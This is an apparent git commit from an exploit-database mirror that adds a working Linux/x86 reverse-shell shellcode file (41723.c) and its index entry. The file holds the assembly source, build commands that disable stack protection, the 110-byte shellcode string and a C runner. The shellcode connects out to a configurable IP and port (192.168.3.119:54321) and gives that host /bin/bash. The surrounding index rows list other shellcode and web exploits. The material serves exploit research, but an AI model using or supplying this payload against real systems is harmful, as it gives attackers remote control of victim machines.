DB: 2017-03-27
1 new exploits Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)
This commit is contained in:
parent
f3bbe1df4c
commit
d2c8c83204
2 changed files with 100 additions and 0 deletions
|
@ -16019,6 +16019,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
|
41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
|
||||||
41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
|
41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
|
||||||
41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
|
41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
|
||||||
|
41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0
|
||||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
99
platforms/lin_x86/shellcode/41723.c
Executable file
99
platforms/lin_x86/shellcode/41723.c
Executable file
|
@ -0,0 +1,99 @@
|
||||||
|
/*
|
||||||
|
; File name: reversebash.nasm
|
||||||
|
; Author: Jasmin Landry (@JR0ch17)
|
||||||
|
; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119
|
||||||
|
; To change
|
||||||
|
; Shellcode length: 110 bytes
|
||||||
|
; Tested on Ubuntu 12.04.5 32-bit (x86)
|
||||||
|
; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g
|
||||||
|
; Link: ld -z execstack -o reversebash reversebash.o
|
||||||
|
; Use objdump to find shellcode and copy it over to the code section of the .c file
|
||||||
|
; Compile: gcc -m32 -fno-stack-protector -z execstack reversebash.c -o reversebash2
|
||||||
|
|
||||||
|
global _start
|
||||||
|
|
||||||
|
section .text
|
||||||
|
_start:
|
||||||
|
jmp short call_shellcode
|
||||||
|
|
||||||
|
shellcode:
|
||||||
|
xor eax, eax
|
||||||
|
xor ebx, ebx
|
||||||
|
xor ecx, ecx
|
||||||
|
|
||||||
|
pop edx
|
||||||
|
|
||||||
|
push 0x6
|
||||||
|
push 0x1
|
||||||
|
push 0x2
|
||||||
|
|
||||||
|
mov al, 0x66
|
||||||
|
mov bl, 0x1
|
||||||
|
mov ecx, esp
|
||||||
|
int 0x80
|
||||||
|
|
||||||
|
mov esi, eax
|
||||||
|
|
||||||
|
xor eax, eax
|
||||||
|
push eax
|
||||||
|
push dword [edx+2]
|
||||||
|
push word [edx]
|
||||||
|
push word 0x2
|
||||||
|
mov ecx, esp
|
||||||
|
push 0x10
|
||||||
|
push ecx
|
||||||
|
push esi
|
||||||
|
mov al, 0x66
|
||||||
|
mov bl, 0x3
|
||||||
|
mov ecx, esp
|
||||||
|
int 0x80
|
||||||
|
|
||||||
|
xor ecx, ecx
|
||||||
|
mov cl, 0x3
|
||||||
|
|
||||||
|
loop:
|
||||||
|
dec cl
|
||||||
|
mov al, 0x3f
|
||||||
|
mov ebx, esi
|
||||||
|
int 0x80
|
||||||
|
|
||||||
|
mov esi, eax
|
||||||
|
jnz loop
|
||||||
|
|
||||||
|
xor eax, eax
|
||||||
|
xor ecx, ecx
|
||||||
|
push ecx
|
||||||
|
push 0x68736162
|
||||||
|
push 0x2f6e6962
|
||||||
|
push 0x2f2f2f2f
|
||||||
|
mov ebx, esp
|
||||||
|
push ecx
|
||||||
|
push ebx
|
||||||
|
mov al, 0xb
|
||||||
|
mov ecx, esp
|
||||||
|
xor edx, edx
|
||||||
|
int 0x80
|
||||||
|
|
||||||
|
call_shellcode:
|
||||||
|
call shellcode
|
||||||
|
port: db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 ;First 2 bytes are port and last 4 are IP. Please change these bytes to reflect your environment and recompile.
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
|
||||||
|
#include<stdio.h>
|
||||||
|
#include<string.h>
|
||||||
|
|
||||||
|
unsigned char code[] = \
|
||||||
|
"\xeb\x61\x31\xc0\x31\xdb\x31\xc9\x5a\x6a\x06\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc6\x31\xc0\x50\xff\x72\x02\x66\xff\x32\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb0\x66\xb3\x03\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\x89\xf3\xcd\x80\x89\xc6\x75\xf4\x31\xc0\x31\xc9\x51\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x51\x53\xb0\x0b\x89\xe1\x31\xd2\xcd\x80\xe8\x9a\xff\xff\xff\xd4\x31\xc0\xa8\x03\x77"; //Again, the last 4 bytes are the IP and the 2 before those are the port.
|
||||||
|
|
||||||
|
main()
|
||||||
|
{
|
||||||
|
|
||||||
|
printf("Shellcode Length: %d\n", strlen(code));
|
||||||
|
|
||||||
|
int (*ret)() = (int(*)())code;
|
||||||
|
|
||||||
|
ret();
|
||||||
|
|
||||||
|
}
|
Loading…
Add table
Reference in a new issue